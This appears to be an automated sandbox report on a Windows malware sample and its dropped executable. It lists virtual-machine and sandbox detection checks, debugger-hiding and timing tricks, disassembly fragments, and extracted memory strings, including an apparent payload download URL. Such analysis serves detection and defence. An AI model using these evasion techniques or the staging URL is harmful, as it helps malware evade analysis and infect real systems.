        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeFile opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
        Source: BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://BGREENIDAHO.COM/NEWFILE/BIN_UFDEK247.BIN
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: C:\Windows\explorer.exe TID: 7152Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4488Thread sleep count: 104 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4488Thread sleep time: -208000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B40A79 rdtsc 1_2_02B40A79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 2.2 %
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeAPI coverage: 1.0 %
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeAPI coverage: 1.0 %
        Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 1.6 %
        Source: C:\Windows\SysWOW64\wscript.exeAPI coverage: 1.5 %
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F2FA90 FindFirstFileW,FindNextFileW,FindClose,14_2_02F2FA90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F2FA89 FindFirstFileW,FindNextFileW,FindClose,14_2_02F2FA89
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSystem information queried: ModuleInformationJump to behavior
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: BL_CI_PL.exe, 0000000A.00000003.26182417693.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861907176.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860498869.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188982236.00000000008D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29294663077.00000000007D3000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256514506.00000000007D3000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29300200791.00000000007D3000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29454227879.000000000079F000.00000004.00000020.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347354430.000000000079F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: k4n8p7lb.exe, 0000001B.00000002.29454227879.000000000079F000.00000004.00000020.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347354430.000000000079F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW_
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: firefox.exe, 00000018.00000002.28539309869.00000206223AF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: k4n8p7lb.exe, 00000020.00000002.30160035805.0000000002420000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000021.00000002.30160236934.0000000002450000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
        Source: BL_CI_PL.exe, 00000001.00000002.25498025009.00000000031E0000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874716152.0000000003170000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965590309.0000000003180000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29976228145.0000000002C70000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060229035.00000000031A0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW_c@/
        Source: BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: vmicvss
        Source: k4n8p7lb.exe, 0000001B.00000002.29453696047.0000000000734000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW !z%SystemRoot%\system32\mswsock.dll
        Source: k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWH
        Source: BL_CI_PL.exe, 0000000A.00000003.26182417693.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861907176.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860498869.00000000008D4000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188982236.00000000008D4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWiP
        Source: explorer.exe, 0000000D.00000000.25899320746.00000000117FF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26001168759.00000000117FF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW}
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: BL_CI_PL.exe, 00000001.00000002.25498087890.00000000032A9000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26190246739.0000000002559000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000017.00000002.28874958597.0000000003239000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000019.00000002.28965706482.0000000003249000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301681478.0000000002549000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455449693.0000000002539000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001E.00000002.29977818605.00000000032B9000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001F.00000002.30060557104.0000000003269000.00000004.00000001.sdmp, k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: BL_CI_PL.exe, 0000000A.00000002.26190152541.0000000002490000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29301474748.0000000002480000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29455284321.0000000002470000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://bgreenidaho.com/Newfile/bin_UFDek247.bin
        Source: k4n8p7lb.exe, 00000020.00000002.30160598943.0000000002639000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B40A79 rdtsc 1_2_02B40A79
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B401BF mov eax, dword ptr fs:[00000030h]1_2_02B401BF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B3F791 mov eax, dword ptr fs:[00000030h]1_2_02B3F791
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B3C3FE mov eax, dword ptr fs:[00000030h]1_2_02B3C3FE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAE89 mov eax, dword ptr fs:[00000030h]10_2_1E8DAE89
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DAE89 mov eax, dword ptr fs:[00000030h]10_2_1E8DAE89
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DBE80 mov eax, dword ptr fs:[00000030h]10_2_1E8DBE80
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECEA0 mov eax, dword ptr fs:[00000030h]10_2_1E8ECEA0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h]10_2_1E8E2EB8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E2EB8 mov eax, dword ptr fs:[00000030h]10_2_1E8E2EB8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E970EAD mov eax, dword ptr fs:[00000030h]10_2_1E970EAD
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E970EAD mov eax, dword ptr fs:[00000030h]10_2_1E970EAD
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E979ED2 mov eax, dword ptr fs:[00000030h]10_2_1E979ED2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F1ED8 mov eax, dword ptr fs:[00000030h]10_2_1E8F1ED8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984EC1 mov eax, dword ptr fs:[00000030h]10_2_1E984EC1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBED0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBED0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E1EED mov eax, dword ptr fs:[00000030h]10_2_1E8E1EED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E1EED mov eax, dword ptr fs:[00000030h]10_2_1E8E1EED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E1EED mov eax, dword ptr fs:[00000030h]10_2_1E8E1EED
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8B2EE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8B2EE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8B2EE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8B2EE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3EE2 mov eax, dword ptr fs:[00000030h]10_2_1E8B3EE2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E953EFC mov eax, dword ptr fs:[00000030h]10_2_1E953EFC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96EEE7 mov eax, dword ptr fs:[00000030h]10_2_1E96EEE7
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8ACEF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8ACEF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8ACEF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8ACEF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8ACEF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8ACEF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3E01 mov eax, dword ptr fs:[00000030h]10_2_1E8B3E01
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8B6E00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8B6E00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8B6E00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8B6E00
